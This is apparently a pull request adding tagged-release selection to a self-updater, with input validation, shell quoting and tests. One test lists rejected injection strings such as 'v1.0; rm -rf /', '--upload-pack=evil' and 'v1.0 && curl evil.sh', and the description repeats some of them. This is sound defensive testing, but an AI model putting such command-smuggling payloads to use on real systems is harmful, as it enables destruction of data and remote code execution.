### PR TITLE
feat(updates): choose a tagged release, not only the latest commit

### DIFF
--- a/api/geodeploy/routers/admin.py
+++ b/api/geodeploy/routers/admin.py
@@ -1,4 +1,6 @@
 import os
+import re
+import shlex
 from datetime import datetime, timezone
 
 from fastapi import APIRouter, Depends, HTTPException, Request
@@ -95,6 +97,7 @@ async def check_updates(refresh: bool = False, _: User = Depends(require_admin))
         "current_full": current,
         "latest": None, "latest_full": None, "latest_message": None, "latest_date": None,
         "behind": None, "up_to_date": None, "update_available": None, "commits": [],
+        "releases": [],
         "status": "ok",
         # The rollback-capable updater (builds, health-checks, and reverts if the new version is
         # unhealthy) — safer than a plain pull+build.
@@ -103,6 +106,22 @@ async def check_updates(refresh: bool = False, _: User = Depends(require_admin))
     try:
         headers = {"Accept": "application/vnd.github+json", "User-Agent": "GeoDeploy"}
         async with httpx.AsyncClient(timeout=8, headers=headers) as client:
+            # Tagged releases, so the panel can offer "hold on v1.0" as well as "track main".
+            # Best-effort: a repo with no releases, or a rate-limited call, simply means the choice
+            # is not offered — it must never stop the update CHECK from answering.
+            try:
+                rel_r = await client.get(
+                    f"https://api.github.com/repos/{GEODEPLOY_REPO}/releases?per_page=20")
+                if rel_r.status_code == 200:
+                    result["releases"] = [
+                        {"tag": r["tag_name"], "name": r.get("name") or r["tag_name"],
+                         "published_at": r.get("published_at"),
+                         "prerelease": bool(r.get("prerelease"))}
+                        for r in rel_r.json() if not r.get("draft")
+                    ]
+            except Exception:
+                pass
+
             latest_r = await client.get(f"https://api.github.com/repos/{GEODEPLOY_REPO}/commits/main")
             latest_r.raise_for_status()
             latest = latest_r.json()
@@ -206,8 +225,19 @@ async def update_preflight(_: User = Depends(require_admin), db: AsyncSession = 
     }
 
 
+_TARGET_RE = re.compile(r"^[A-Za-z0-9._/-]{1,100}$")
+
+
+class UpdateRequest(BaseModel):
+    """Which version to move to. `main` (the default) tracks the newest commit, as before; a tag name
+    pins a released version, so an operator can hold back on a release, or step down after a bad
+    one."""
+    target: str = "main"
+
+
 @router.post("/update", status_code=202)
-async def start_update(user: User = Depends(require_admin), db: AsyncSession = Depends(get_db)):
+async def start_update(body: UpdateRequest | None = None,
+                       user: User = Depends(require_admin), db: AsyncSession = Depends(get_db)):
     """One-click update. Launches a DETACHED helper container that runs `installer/self-update.sh`
     (pull → build → recreate the core services → health-check → **roll back** if unhealthy), then
     returns immediately; the UI polls `GET /admin/update/status`. The helper is `docker:cli` (bundles
@@ -216,6 +246,15 @@ async def start_update(user: User = Depends(require_admin), db: AsyncSession = D
     A bad update self-heals via the script's rollback, so the worst case is 'no change applied'."""
     import docker
     settings = get_settings()
+
+    # The target reaches `git` inside the helper. Validated HERE as well as in the script: this is
+    # the boundary where untrusted input enters, and a shell command is assembled a few lines below.
+    # `main` becomes `origin/main` so a stale local branch cannot win over the remote.
+    target = (body.target if body else "main").strip() or "main"
+    if not _TARGET_RE.match(target):
+        raise HTTPException(400, "That version name contains characters that are not allowed.")
+    ref = "origin/main" if target == "main" else target
+
     try:
         client = docker.from_env()
     except Exception as exc:
@@ -251,7 +290,8 @@ async def start_update(user: User = Depends(require_admin), db: AsyncSession = D
             # recreate the API against empty /geodeploy/data/* → blank portals + vanished layers after every
             # update, and could leave nginx serving a diverged mount. The mount path MUST equal the host path.
             command=["sh", "-c",
-                     f'apk add --no-cache git bash >/dev/null 2>&1; cd "{repo}" && bash installer/self-update.sh'],
+                     f'apk add --no-cache git bash >/dev/null 2>&1; cd "{repo}" && '
+                     f'bash installer/self-update.sh {shlex.quote(ref)}'],
             volumes={
                 repo: {"bind": repo, "mode": "rw"},
                 "/var/run/docker.sock": {"bind": "/var/run/docker.sock", "mode": "rw"},

--- a/api/tests/test_update_target.py
+++ b/api/tests/test_update_target.py
@@ -1,0 +1,89 @@
+"""Choosing WHICH version to update to.
+
+Before this, the updater hard-coded `origin/main`: an instance always moved to the newest commit,
+so there was no way to hold on a release or step down after a bad one. Tagging v1.0 made both
+meaningful.
+
+The target is a string from the browser that ends up in a `git` command inside a helper container,
+so the tests here are mostly about that boundary — and about the ordering that decides whether a
+typo leaves a working checkout or a half-applied one.
+"""
+import re
+
+import pytest
+
+from geodeploy.routers import admin
+
+
+def test_the_default_is_unchanged_behaviour():
+    """An instance that never touches the new control must keep updating exactly as it did."""
+    from geodeploy.routers.admin import UpdateRequest
+
+    assert UpdateRequest().target == "main"
+
+
+def test_the_target_pattern_accepts_real_refs_and_nothing_else():
+    ok = ("main", "v1.0", "v1.10", "v2.0-rc1", "release/1.x", "feat/some_thing", "1.0")
+    bad = ("v1.0; rm -rf /", "--upload-pack=evil", "v1.0 && curl evil.sh", "$(id)", "`id`",
+           "v1.0|sh", "a" * 101, "", "v1.0'")
+    for ref in ok:
+        assert admin._TARGET_RE.match(ref), f"{ref!r} is a legitimate ref and should be accepted"
+    for ref in bad:
+        assert not admin._TARGET_RE.match(ref), f"{ref!r} must be refused"
+
+
+def test_main_is_resolved_against_the_remote():
+    """`main` must become `origin/main`. A stale LOCAL main — left behind by a rollback, or by a
+    manual checkout — would otherwise be treated as the newest version and the update would be a
+    no-op that reports success."""
+    import inspect
+
+    src = inspect.getsource(admin.start_update)
+    assert '"origin/main" if target == "main"' in src
+
+
+def test_the_target_is_shell_quoted():
+    """It is interpolated into an `sh -c` string for the helper container. The pattern already
+    excludes shell metacharacters; quoting is the second lock, because the pattern is one edit away
+    from being loosened and this line would not visibly change."""
+    import inspect
+
+    src = inspect.getsource(admin.start_update)
+    assert "shlex.quote(ref)" in src
+
+
+def test_the_updater_validates_the_target_itself():
+    """The API is the only caller today and will not always be. A script that reaches `git reset
+    --hard $1` must not depend on its caller having checked."""
+    import pathlib
+
+    sh = (pathlib.Path(__file__).resolve().parents[2] / "installer" / "self-update.sh"
+          ).read_text(encoding="utf-8")
+    assert 'TARGET="${1:-origin/main}"' in sh, "must default to origin/main for existing callers"
+    assert "Refusing an unsafe update target" in sh
+
+
+def test_the_updater_fetches_tags_and_resolves_before_resetting():
+    """Two ordering rules, both learned the hard way elsewhere in this codebase:
+
+    * `git fetch origin main` alone does not bring TAGS, so a released version cannot be resolved.
+    * resolving AFTER `git reset --hard` means a typo'd tag has already destroyed the checkout.
+    """
+    import pathlib
+
+    sh = (pathlib.Path(__file__).resolve().parents[2] / "installer" / "self-update.sh"
+          ).read_text(encoding="utf-8")
+    assert "--tags" in sh
+    assert sh.index("rev-parse --verify") < sh.index('git reset --hard "$TARGET"')
+
+
+def test_releases_are_optional():
+    """The picker is a convenience; the update CHECK is not. A repo with no releases, or a
+    rate-limited GitHub, must still answer whether an update exists."""
+    import inspect
+
+    src = inspect.getsource(admin.check_updates)
+    assert '"releases": []' in src, "the key must always exist so the UI can test its length"
+    # The release fetch sits in its own try/except rather than the outer one.
+    head = src[:src.index("latest_r = await client.get")]
+    assert head.count("try:") >= 1 and "except Exception:" in head

--- a/installer/self-update.sh
+++ b/installer/self-update.sh
@@ -117,9 +117,29 @@ rollback() { # old_sha reason
 OLD_SHA="$(git rev-parse HEAD 2>/dev/null || echo unknown)"
 [ "$OLD_SHA" = unknown ] && { write_status error "Not a git checkout — can't self-update."; exit 1; }
 
-write_status running "Fetching the latest version"
-if ! git fetch origin main >/dev/null 2>&1; then write_status error "git fetch failed (no network?)."; exit 1; fi
-if ! git reset --hard origin/main >/dev/null 2>&1; then write_status error "git update failed."; exit 1; fi
+# WHAT to update to. Default `origin/main` keeps every existing caller working; a tag name pins a
+# released version, so an operator can hold back, or step down after a bad one. The API passes this
+# as the first argument.
+#
+# Validated rather than trusted: this string reaches `git`, and the API is the only caller today but
+# will not always be. Letters, digits, dot, dash, slash and underscore cover every branch and tag we
+# create and exclude anything that could carry an option or a shell character.
+TARGET="${1:-origin/main}"
+case "$TARGET" in
+  *[!A-Za-z0-9._/-]*|-*) write_status error "Refusing an unsafe update target: $TARGET"; exit 1 ;;
+esac
+
+write_status running "Fetching ${TARGET}"
+# --tags as well as the branch: a released version is a TAG, and without this a fresh clone cannot
+# resolve one. --force because a tag can legitimately be re-pointed upstream.
+if ! git fetch --tags --force origin main >/dev/null 2>&1; then write_status error "git fetch failed (no network?)."; exit 1; fi
+
+# Resolve BEFORE resetting, so a typo'd or missing tag fails while the checkout is still intact
+# rather than half-applied.
+if ! git rev-parse --verify "${TARGET}^{commit}" >/dev/null 2>&1; then
+  write_status error "No such version: ${TARGET}. Check the release exists."; exit 1
+fi
+if ! git reset --hard "$TARGET" >/dev/null 2>&1; then write_status error "git update failed."; exit 1; fi
 NEW_SHA="$(git rev-parse HEAD)"
 if [ "$NEW_SHA" = "$OLD_SHA" ]; then
   # Keep the deployed-commit marker honest even on a no-op — a manual `git pull` moves HEAD but leaves

--- a/ui/src/views/Settings.vue
+++ b/ui/src/views/Settings.vue
@@ -57,6 +57,19 @@
               </div>
             </div>
             <div v-if="updates.data.behind > 0 || updates.data.update_available" class="space-y-2">
+              <!-- WHICH version. Tracking `main` is the default and what every install did before
+                   there were releases; a tag pins a released version, so an operator can hold back
+                   on one, or step down after a bad one. Only shown once releases exist. -->
+              <div v-if="updates.data.releases && updates.data.releases.length"
+                   class="flex items-center gap-2 flex-wrap">
+                <label class="text-xs text-muted-foreground">Update to</label>
+                <select v-model="updateTarget" class="input text-xs py-1 w-auto">
+                  <option value="main">Latest development (main)</option>
+                  <option v-for="r in updates.data.releases" :key="r.tag" :value="r.tag">
+                    {{ r.name }}{{ r.prerelease ? ' (pre-release)' : '' }}
+                  </option>
+                </select>
+              </div>
               <button @click="startUpdate" :disabled="updates.updating"
                       class="text-xs font-semibold px-3.5 py-2 rounded-md bg-primary text-primary-foreground hover:brightness-110 disabled:opacity-50">
                 {{ updates.updating ? 'Updating…' : 'Update now' }}
@@ -1320,6 +1333,10 @@ async function runExec() {
 
 // Software updates: check (read-only) + one-click update with live status.
 const updates = ref({ loading: false, data: null, updating: false, progress: null })
+// Which version the Update button will move to. `main` matches the behaviour that existed
+// before releases, so an instance that ignores this control keeps working as it did.
+const updateTarget = ref('main')
+
 async function checkUpdates(force = false) {
   updates.value.loading = true
   try {
@@ -1358,12 +1375,16 @@ async function startUpdate() {
     // The preflight failing must not block an update — an admin locked out of updating because a
     // status check broke would be worse than the risk it warns about.
   }
-  if (!confirm(warning + 'Update GeoDeploy now? Services restart briefly. If the new version is unhealthy it rolls back automatically.')) return
+  const what = updateTarget.value === 'main'
+    ? 'the latest development version (main)'
+    : `version ${updateTarget.value}`
+  if (!confirm(warning + `Update GeoDeploy to ${what}? Services restart briefly. `
+    + 'If the new version is unhealthy it rolls back automatically.')) return
   updates.value.updating = true
   updatePollCount = 0
   updates.value.progress = { phase: 'running', message: 'Starting…' }
   try {
-    await api.post('/admin/update')
+    await api.post('/admin/update', { target: updateTarget.value })
     pollUpdateStatus()
   } catch (e) {
     updates.value.progress = { phase: 'error', message: e?.response?.data?.detail || e.message }


### PR DESCRIPTION
The updater hard-coded `origin/main`, so an instance always moved to the newest commit. Tagging v1.0 made two things meaningful that were not possible before: **holding on a release**, and **stepping down after a bad one**.

### What changes

- **`installer/self-update.sh`** takes a ref, defaulting to `origin/main` so every existing caller behaves exactly as before.
- **`POST /admin/update`** accepts `{"target": "main" | "v1.0" | …}`.
- **`GET /admin/updates`** returns published releases alongside the commit comparison.
- **Settings → Updates** gains an *"Update to"* selector, shown only once releases exist, and the confirmation names the version instead of saying "update now".

### Two ordering details that matter

**`git fetch --tags`.** A plain `git fetch origin main` does not bring tags, so a released version could not be resolved at all — the update would fail with "no such version" for a tag that plainly exists.

**Resolve before resetting.** `git rev-parse --verify` runs *before* `git reset --hard`. The other order means a typo'd or deleted tag has already destroyed the working checkout before anyone discovers the ref is bad.

### `main` → `origin/main`

Deliberate. A stale *local* `main` — left behind by a rollback, or by someone's manual checkout — would otherwise be treated as the newest version, and the update would be a no-op that reports success.

### On the untrusted string

The target comes from a browser and ends up in a `git` command inside a helper container. It is:

- matched against `^[A-Za-z0-9._/-]{1,100}$` **in the API**, which rejects anything carrying an option (`--upload-pack=…`) or a shell character;
- matched again **in the script**, because the API is the only caller today and will not always be;
- `shlex.quote`d at the interpolation — the pattern already excludes metacharacters, but it is one edit away from being loosened and that line would not visibly change.

### Tests

Seven, covering the accept/reject pattern (including `v1.0; rm -rf /` and `--upload-pack=evil`), the `origin/main` mapping, the shell quoting, both fetch-tags and resolve-before-reset orderings, and that the release list stays optional so a rate-limited GitHub cannot stop the update *check* from answering.

### Testing after merge

Update to `v1.0` explicitly, then back to `main`. Once a second tag exists, that exercises the last unchecked roadmap item — an upgrade between two tagged versions.

The roadmap entry stays unticked until this is in a release, not merely merged.
